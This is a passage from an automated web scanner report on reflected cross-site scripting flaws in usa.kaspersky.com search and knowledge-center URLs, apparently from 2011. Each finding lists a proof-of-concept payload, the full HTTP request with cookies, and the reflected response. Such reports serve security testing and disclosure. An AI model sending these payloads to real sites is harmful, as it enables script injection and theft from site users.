The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e91be"-alert(1)-"12aebe11698 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /resources/knowledge-center/whitepaperse91be"-alert(1)-"12aebe11698 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139084465-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fresources%25252Fknowledge-center%25252Fwhitepapers%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:13:39 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315142019"
Content-Type: text/html; charset=utf-8
Content-Length: 31873
Date: Sun, 04 Sep 2011 13:13:44 GMT
X-Varnish: 1163134991
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
}
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/resources/knowledge-center/whitepaperse91be"-alert(1)-"12aebe11698";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.150. http://usa.kaspersky.com/resources/knowledge-center/whitepapers [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/resources/knowledge-center/whitepapers

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e3d7"><script>alert(1)</script>93ae9a92e57 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/knowledge-center/whitepapers?4e3d7"><script>alert(1)</script>93ae9a92e57=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139084465-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fresources%25252Fknowledge-center%25252Fwhitepapers%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:05:40 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141540"
Content-Type: text/html; charset=utf-8
Content-Length: 54350
Date: Sun, 04 Sep 2011 13:06:00 GMT
X-Varnish: 1163120944
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/resources/knowledge-center/whitepapers?4e3d7"><script>alert(1)</script>93ae9a92e57=1" />
...[SNIP]...

1.151. http://usa.kaspersky.com/search/apachesolr_search [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e153"-alert(1)-"fb85deb5a47 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /search7e153"-alert(1)-"fb85deb5a47/apachesolr_search HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:08:10 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145290"
Content-Type: text/html; charset=utf-8
Content-Length: 30641
Date: Sun, 04 Sep 2011 14:08:18 GMT
X-Varnish: 1163250280
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/search7e153"-alert(1)-"fb85deb5a47/apachesolr_search";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.152. http://usa.kaspersky.com/search/apachesolr_search [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a126"><script>alert(1)</script>dc901a9507b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search6a126"><script>alert(1)</script>dc901a9507b/apachesolr_search HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:07:39 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145259"
Content-Type: text/html; charset=utf-8
Content-Length: 30738
Date: Sun, 04 Sep 2011 14:07:49 GMT
X-Varnish: 1163248932
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/search6a126"><script>alert(1)</script>dc901a9507b/apachesolr_search" />
...[SNIP]...

1.153. http://usa.kaspersky.com/search/apachesolr_search [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd98d"><script>alert(1)</script>012d6f3a9b7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/apachesolr_searchcd98d"><script>alert(1)</script>012d6f3a9b7 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:08:58 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145338"
Content-Type: text/html; charset=utf-8
Content-Length: 30229
Date: Sun, 04 Sep 2011 14:09:05 GMT
X-Varnish: 1163252488
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/search/apachesolr_searchcd98d"><script>alert(1)</script>012d6f3a9b7" />
...[SNIP]...

1.154. http://usa.kaspersky.com/search/apachesolr_search [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3361b"><script>alert(1)</script>28ebda2c90f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/apachesolr_search?3361b"><script>alert(1)</script>28ebda2c90f=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:07:11 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145231"
Content-Type: text/html; charset=utf-8
Content-Length: 29658
Date: Sun, 04 Sep 2011 14:07:28 GMT
X-Varnish: 1163247849
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/search/apachesolr_search?3361b"><script>alert(1)</script>28ebda2c90f=1" />
...[SNIP]...

1.155. http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search/far%20help%20virus

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95090"-alert(1)-"6ca4c5faa38 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /search95090"-alert(1)-"6ca4c5faa38/apachesolr_search/far%20help%20virus HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:55:12 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315140912"
Content-Type: text/html; charset=utf-8
Content-Length: 30743
Date: Sun, 04 Sep 2011 12:55:26 GMT
X-Varnish: 1163102337
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/search95090"-alert(1)-"6ca4c5faa38/apachesolr_search/far%20help%20virus";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.156. http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search/far%20help%20virus

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40f83"><script>alert(1)</script>b60263f7e0f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search40f83"><script>alert(1)</script>b60263f7e0f/apachesolr_search/far%20help%20virus HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:54:18 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315140858"
Content-Type: text/html; charset=utf-8
Content-Length: 30840
Date: Sun, 04 Sep 2011 12:54:33 GMT
X-Varnish: 1163100813
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/search40f83"><script>alert(1)</script>b60263f7e0f/apachesolr_search/far%20help%20virus" />
...[SNIP]...

1.157. http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search/far%20help%20virus

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6efd3"><script>alert(1)</script>72b7766c221 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/apachesolr_search6efd3"><script>alert(1)</script>72b7766c221/far%20help%20virus HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:59:16 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141156"
Content-Type: text/html; charset=utf-8
Content-Length: 30297
Date: Sun, 04 Sep 2011 12:59:38 GMT
X-Varnish: 1163109913
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/search/apachesolr_search6efd3"><script>alert(1)</script>72b7766c221/far%20help%20virus" />
...[SNIP]...

1.158. http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search/far%20help%20virus

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0711"><script>alert(1)</script>9f904e9ecf9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/apachesolr_search/far%20help%20virusf0711"><script>alert(1)</script>9f904e9ecf9 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:03:51 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141431"
Content-Type: text/html; charset=utf-8
Content-Length: 31106
Date: Sun, 04 Sep 2011 13:03:56 GMT
X-Varnish: 1163117700
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virusf0711"><script>alert(1)</script>9f904e9ecf9" />
...[SNIP]...

1.159. http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search/far%20help%20virus

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f435"><script>alert(1)</script>c27525afe55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/apachesolr_search/far%20help%20virus?9f435"><script>alert(1)</script>c27525afe55=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:50:42 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315140642"
Content-Type: text/html; charset=utf-8
Content-Length: 38345
Date: Sun, 04 Sep 2011 12:50:56 GMT
X-Varnish: 1163094829
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus?9f435"><script>alert(1)</script>c27525afe55=1" />
...[SNIP]...

1.160. http://usa.kaspersky.com/search/apachesolr_search/index.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search/index.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28500"><script>alert(1)</script>1b71febd288 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search28500"><script>alert(1)</script>1b71febd288/apachesolr_search/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:08:17 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145297"
Content-Type: text/html; charset=utf-8
Content-Length: 32331
Date: Sun, 04 Sep 2011 14:08:25 GMT
X-Varnish: 1163250555
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/search28500"><script>alert(1)</script>1b71febd288/apachesolr_search/index.html" />
...[SNIP]...

1.161. http://usa.kaspersky.com/search/apachesolr_search/index.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search/index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ae97"-alert(1)-"6f128e7c3a8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /search6ae97"-alert(1)-"6f128e7c3a8/apachesolr_search/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:08:36 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145316"
Content-Type: text/html; charset=utf-8
Content-Length: 30691
Date: Sun, 04 Sep 2011 14:08:44 GMT
X-Varnish: 1163251267
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/search6ae97"-alert(1)-"6f128e7c3a8/apachesolr_search/index.html";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.162. http://usa.kaspersky.com/search/apachesolr_search/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search/index.html

Issue detail

